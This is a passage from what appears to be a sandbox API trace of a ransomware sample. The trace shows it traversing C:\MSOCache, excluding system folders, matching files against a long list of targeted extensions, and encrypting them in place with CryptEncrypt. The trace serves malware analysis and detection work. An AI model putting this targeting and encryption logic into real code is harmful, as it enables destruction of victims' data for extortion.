hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0023.955] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0023.956] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-002C-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C" [0023.956] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0023.956] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0023.956] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0023.956] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0023.956] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*" [0023.956] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0023.957] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0023.957] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0023.957] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0023.957] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0023.957] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0023.957] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", pszFile="Proof.en" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en" [0023.957] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpSrch="\\Windows") returned 0x0 [0023.957] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpSrch="\\Program Files") returned 0x0 [0023.957] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpSrch="\\ProgramData") returned 0x0 [0023.957] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpSrch="\\AppData") returned 0x0 [0023.957] PathCombineW (in: pszDest=0x31cde58, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*" [0023.957] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 0x3683b0 [0023.957] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0023.957] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0023.958] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0023.958] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0023.958] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0023.958] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", pszFile="Proof.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" [0023.958] PathFindExtensionW (pszPath="Proof.cab") returned=".cab" [0023.958] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0023.958] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31cd9d4 | out: phKey=0x31cd9d4*=0x368430) returned 1 [0023.958] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0023.958] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x31cd9b8 | out: lpFileSize=0x31cd9b8*=11482605) returned 1 [0023.958] CreateFileMappingW (hFile=0x230, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xaf3612, lpName=0x0) returned 0x26c [0023.958] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0023.958] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xaf0000, dwNumberOfBytesToMap=0x35ed) returned 0xa0000 [0023.960] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0023.960] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xaf35ed) returned 0x3240000 [0023.961] CryptEncrypt (in: hKey=0x368430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31cd9e8*=0xaf35ed, dwBufLen=0xaf35f0 | out: pbData=0x3240000*, pdwDataLen=0x31cd9e8*=0xaf35f0) returned 1 [0024.201] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0xaf35f0) returned 1 [0024.309] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0024.378] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0024.378] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xaf0000, dwNumberOfBytesToMap=0x3612) returned 0xa0000 [0024.379] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31cd998 | out: phHash=0x31cd998) returned 1 [0024.379] CryptHashData (hHash=0x368470, pbData=0xa35ec, dwDataLen=0x4, dwFlags=0x0) returned 1 [0024.379] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0024.379] CryptGetHashParam (in: hHash=0x368470, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31cd988, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31cd988) returned 1 [0024.379] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x3612) returned 1 [0024.380] LocalFree (hMem=0x36ea40) returned 0x0 [0024.380] CryptDestroyHash (hHash=0x368470) returned 1 [0024.380] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0024.380] CloseHandle (hObject=0x26c) returned 1 [0024.380] CloseHandle (hObject=0x230) returned 1 [0024.601] CryptDestroyKey (hKey=0x368430) returned 1 [0024.601] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0024.601] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0024.601] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", pszFile="Proof.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" [0024.601] PathFindExtensionW (pszPath="Proof.msi") returned=".msi" [0024.601] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0024.601] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0024.601] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0024.601] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", pszFile="Proof.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" [0024.601] PathFindExtensionW (pszPath="Proof.xml") returned=".xml" [0024.601] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0024.601] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31cd9d4 | out: phKey=0x31cd9d4*=0x368430) returned 1 [0024.601] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0024.601] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x31cd9b8 | out: lpFileSize=0x31cd9b8*=1347) returned 1 [0024.601] CreateFileMappingW (hFile=0x230, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x572, lpName=0x0) returned 0x26c [0024.601] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0024.602] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x543) returned 0xa0000 [0024.603] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0024.603] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x543) returned 0xa0000 [0024.604] CryptEncrypt (in: hKey=0x368430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31cd9e8*=0x543, dwBufLen=0x550 | out: pbData=0xa0000*, pdwDataLen=0x31cd9e8*=0x550) returned 1 [0024.604] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x550) returned 1 [0024.606] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0024.606] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0024.606] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x572) returned 0xa0000 [0024.607] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31cd998 | out: phHash=0x31cd998) returned 1 [0024.607] CryptHashData (hHash=0x368470, pbData=0xa054c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0024.607] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0024.607] CryptGetHashParam (in: hHash=0x368470, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31cd988, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31cd988) returned 1 [0024.607] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x572) returned 1 [0024.608] LocalFree (hMem=0x36ea40) returned 0x0 [0024.608] CryptDestroyHash (hHash=0x368470) returned 1 [0024.608] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0024.608] CloseHandle (hObject=0x26c) returned 1 [0024.608] CloseHandle (hObject=0x230) returned 1 [0024.609] CryptDestroyKey (hKey=0x368430) returned 1 [0024.609] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 0 [0024.609] FindClose (in: hFindFile=0x3683b0 | out: hFindFile=0x3683b0) returned 1 [0024.609] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0024.609] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0024.609] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", pszFile="Proof.es" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es" [0024.609] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpSrch="\\Windows") returned 0x0 [0024.609] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpSrch="\\Program Files") returned 0x0 [0024.609] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpSrch="\\ProgramData") returned 0x0 [0024.609] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", lpSrch="\\AppData") returned 0x0 [0024.609] PathCombineW (in: pszDest=0x31cde58, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*" [0024.609] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 0x3683b0 [0024.609] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0024.609] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0024.609] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0024.610] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0024.610] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0024.610] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", pszFile="Proof.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" [0024.610] PathFindExtensionW (pszPath="Proof.cab") returned=".cab" [0024.610] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0024.610] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31cd9d4 | out: phKey=0x31cd9d4*=0x368430) returned 1 [0024.610] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0024.610] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x31cd9b8 | out: lpFileSize=0x31cd9b8*=13642474) returned 1 [0024.610] CreateFileMappingW (hFile=0x230, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd02b12, lpName=0x0) returned 0x26c [0024.610] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0024.610] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xd00000, dwNumberOfBytesToMap=0x2aea) returned 0xa0000 [0024.612] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0024.612] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd02aea) returned 0x3240000 [0024.613] CryptEncrypt (in: hKey=0x368430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31cd9e8*=0xd02aea, dwBufLen=0xd02af0 | out: pbData=0x3240000*, pdwDataLen=0x31cd9e8*=0xd02af0) returned 1 [0024.893] FlushViewOfFile (lpBaseAddress=0x3240000, dwNumberOfBytesToFlush=0xd02af0) returned 1 [0025.036] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0025.107] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0025.107] MapViewOfFile (hFileMappingObject=0x26c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xd00000, dwNumberOfBytesToMap=0x2b12) returned 0xa0000 [0025.108] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31cd998 | out: phHash=0x31cd998) returned 1 [0025.108] CryptHashData (hHash=0x368470, pbData=0xa2aec, dwDataLen=0x4, dwFlags=0x0) returned 1 [0025.108] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0025.108] CryptGetHashParam (in: hHash=0x368470, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31cd988, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31cd988) returned 1 [0025.108] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x2b12) returned 1 [0025.109] LocalFree (hMem=0x36ea40) returned 0x0 [0025.109] CryptDestroyHash (hHash=0x368470) returned 1 [0025.109] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0025.109] CloseHandle (hObject=0x26c) returned 1 [0025.109] CloseHandle (hObject=0x230) returned 1 [0025.340] CryptDestroyKey (hKey=0x368430) returned 1 [0025.340] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0025.340] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0025.340] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", pszFile="Proof.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" [0025.340] PathFindExtensionW (pszPath="Proof.msi") returned=".msi" [0025.340] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0025.340] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0025.340] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0025.340] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es", pszFile="Proof.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned="C:\\MSOCache\\All 